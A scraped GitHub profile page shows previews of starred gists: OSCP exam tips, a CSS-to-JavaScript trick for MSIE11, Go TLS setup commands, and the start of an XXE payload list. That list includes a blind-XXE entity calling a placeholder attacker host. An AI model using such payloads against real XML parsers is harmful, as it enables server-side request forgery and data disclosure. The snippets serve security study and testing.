Skip to content

Instantly share code, notes, and snippets.

View xufuou's full-sized avatar

Fuou Xu xufuou

17 followers · 8 following
  • Portugal
View GitHub Profile
@unfo
unfo / how-to-oscp-final.md
Last active February 26, 2024 08:39

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@cure53
cure53 / scriptlet.md
Last active February 1, 2024 19:33
The Scriptless Scriptlet - Or how to execute JavaScript from CSS in MSIE11 without using Scripts

The Scriptless Scriptlet

Or how to execute JavaScript from CSS in MSIE11 without using Scripts

Stop! This text is only interesting for you if you...

  • Like popping alerts in weird situations
  • Miss CSS expressions as much as we do
  • Have an unhealthy obsession for markup porn

Introduction

@denji
denji / golang-tls.md
Last active June 22, 2024 09:48 — forked from spikebike/client.go
Simple Golang HTTPS/TLS Examples

Moved to git repository: https://github.com/denji/golang-tls

Generate private key (.key)
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)
@staaldraad
staaldraad / XXE_payloads
Last active June 15, 2024 16:32
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>